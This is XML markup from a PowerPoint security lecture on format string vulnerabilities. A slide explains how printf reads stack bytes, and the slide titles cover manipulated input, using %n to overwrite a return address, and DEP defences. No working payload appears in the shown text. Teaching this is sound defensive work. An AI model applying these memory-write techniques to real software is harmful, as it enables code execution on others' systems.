            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(format)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Stack will be the same but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 the value of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC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the address of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC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the value of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC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and the address of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>when the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf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function accessed the first </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%</a:t>
            </a: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/>
              <a:t>, it would retrieve the next four bytes on the stack (part of the string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>format</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) and print those as an integer</a:t>
            </a:r>
          </a:p>
          <a:p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Picture 3" descr="Screen Shot 2017-10-15 at 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92" y="2492896"/>
            <a:ext cx="2116708" cy="39330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092280" y="4221088"/>
            <a:ext cx="20517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0272" y="4653136"/>
            <a:ext cx="21237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92280" y="5157192"/>
            <a:ext cx="20517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5661248"/>
            <a:ext cx="21237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404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13632</TotalTime>
  <Words>1129</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>171</Paragraphs>
  <Slides>25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PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>What is Format String</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Variable Arguments in C</vt:lpstr>
      <vt:lpstr>Format Strings in C</vt:lpstr>
      <vt:lpstr>Writing Stack with Format Strings</vt:lpstr>
      <vt:lpstr>Stack Look</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Data Access</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Harmless Input</vt:lpstr>
      <vt:lpstr>Manipulated Input</vt:lpstr>
      <vt:lpstr>Get Environment</vt:lpstr>
      <vt:lpstr>Normal Input</vt:lpstr>
      <vt:lpstr>Manipulated Input</vt:lpstr>
      <vt:lpstr>Write to Memory</vt:lpstr>
      <vt:lpstr>Write to Return Addr</vt:lpstr>
      <vt:lpstr>Write to Return Addr</vt:lpstr>
      <vt:lpstr>Using %n to Mung Return Address</vt:lpstr>
      <vt:lpstr>Write Exact Value</vt:lpstr>
      <vt:lpstr>Formula for Format String</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Buffer Overflow: Causes and Cures</vt:lpstr>
      <vt:lpstr>WX / DEP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175</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-09-10T15:34:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-17T03:00:24Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>